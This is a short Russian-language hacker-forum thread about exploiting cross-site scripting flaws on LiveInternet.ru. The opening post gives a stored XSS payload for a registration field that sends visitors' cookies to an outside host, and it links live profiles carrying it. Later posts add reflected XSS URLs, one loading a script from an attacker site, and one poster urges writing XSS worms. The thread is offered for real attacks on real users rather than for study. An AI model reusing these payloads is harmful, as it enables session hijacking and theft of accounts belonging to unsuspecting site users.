|
XSS в дневнике LiveInternet.ru
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах" Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>потом все кто помотрит ваш профиль отдаст куки... Примеры: http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки http://www.liveinternet.ru/users/nokia1/profile/ - алерт. |
О! санкс! всё пашет!
|
да..+ тебе )))
хотя уже пол года назад знал.....там ваще админы тупят... |
http://www.liveinternet.ru/journal_register.php
Поле:*Подтвердить пароль: не фильтруется! |
)) прикольно,лови +
|
Туплю, не нашел этот пункт :(
Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами :( |
именно поэтому ты и не нашёл этот пунктик.
Надо региться заного, тогда найдёшь. |
Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)
|
http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0
Пассивная ХSS почти там же! |
PASSIVE XSS при реге счетчиков
http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url =http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><scri pt src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check= mikmik&keywords=&private=&subscribe=on&group=ru&gr oup=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+ |
| Время: 03:32 |